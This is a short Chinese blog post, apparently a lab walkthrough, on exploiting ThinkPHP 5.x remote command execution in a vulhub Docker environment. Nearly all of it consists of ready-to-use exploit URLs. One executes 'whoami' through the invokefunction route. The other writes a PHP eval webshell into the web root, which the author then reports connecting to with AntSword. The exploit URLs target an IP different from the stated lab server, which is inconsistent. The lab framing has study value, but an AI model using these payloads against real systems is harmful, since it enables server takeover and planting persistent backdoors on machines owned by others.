Thinkphp(TP)框架漏洞攻略

故事与他6452025-03-26 2:07

Thinkphp5x远程命令执⾏及getshell

环境配置

云服务器:121.40.229.129:8080

靶场:vulhub/thinkphp/5-rce

docker-compose up -d #启动环境

访问靶场:http://121.40.229.129:8080/

远程命令执⾏

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

根⽬录⽣成11.php ⽂件

http://39.105.61.160:8080/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval(\$_POST[cmd]);?%3E%22%20%3E11.php

使用蚁剑连接成功

相关推荐
A.A呐33 分钟前
【Linux第十三章】缓冲区
linux·服务器
Blurpath住宅代理36 分钟前
代理IP全面解析:从协议原理到高阶应用场景的技术指南
网络·静态ip·动态代理·住宅ip·住宅代理
想唱rap1 小时前
Linux线程
java·linux·运维·服务器·开发语言·mysql
JFSJFX1 小时前
手机短信误删怎么办?这4种恢复办法亲测有效,轻松找回短信
运维·服务器
dalancon2 小时前
SurfaceControl 的事务提交给 SurfaceFlinger,以及 SurfaceFlinger 如何将这些数据设置到对应 Layer 的完整流程
android
dalancon2 小时前
SurfaceFlinger Layer 到 HWC 通信流程详解
android
cccccc语言我来了2 小时前
Linux(9)操作系统
android·java·linux
晏宁科技YaningAI2 小时前
全球短信路由系统设计逻辑打破 80%送达率瓶颈:工程实践拆解
网络·网络协议·架构·gateway·信息与通信·paas
yige452 小时前
【MySQL】MySQL内置函数--日期函数字符串函数数学函数其他相关函数
android·mysql·adb
AI-Ming2 小时前
程序员转行学习 AI 大模型: 踩坑记录:服务器内存不够,程序被killed
服务器·人工智能·python·gpt·深度学习·学习·agi
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)05班级宠物园部署指南06【计算机一级WPSoffice】小黑课堂题库软件下载安装教程(2026年3月最新版)07“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)08UV安装并设置国内源09中国象棋-html版本10OpenClaw 使用和管理 MCP 完全指南